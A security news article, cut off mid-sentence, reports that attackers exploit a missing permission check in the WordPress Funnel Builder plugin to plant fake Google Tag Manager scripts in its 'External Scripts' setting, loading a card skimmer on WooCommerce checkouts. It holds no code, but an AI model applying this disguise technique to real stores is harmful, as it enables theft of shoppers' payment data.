Attackers exploit Funnel Builder bug to inject e-skimmers into e-stores

Attackers exploit Funnel Builder bug to inject e-skimmers into e-stores

Pierluigi Paganini
May 17, 2026

Attackers are exploiting a critical flaw in the WordPress Funnel Builder plugin to inject skimming code into WooCommerce checkout pages.

A critical vulnerability in the WordPress Funnel Builder plugin is being actively exploited to inject malicious JavaScript into WooCommerce checkout pages, according to Sansec researchers.

Funnel Builder by FunnelKit is a checkout and upsell plugin installed on over 40,000 WooCommerce stores. 

Attackers injected an e-skimmer code designed to steal customers’ card and payment details during purchases. Website owners using the plugin are urged to apply security updates immediately and review checkout pages for signs of compromise.

“Attackers are planting fake Google Tag Manager scripts into the plugin’s “External Scripts” setting. The injected code looks like ordinary analytics next to the store’s real tags, but loads a payment skimmer that steals credit card numbers, CVVs and billing addresses from checkout.” reads the report published by Sansec.

The researchers state that a critical flaw in the WordPress Funnel Builder plugin lets unauthenticated attackers inject malicious scripts into WooCommerce checkout pages. The vulnerable endpoint fails to verify permissions and allows attackers to modify global plugin settings, including the “External Scripts” option. By planting a malicious



Source link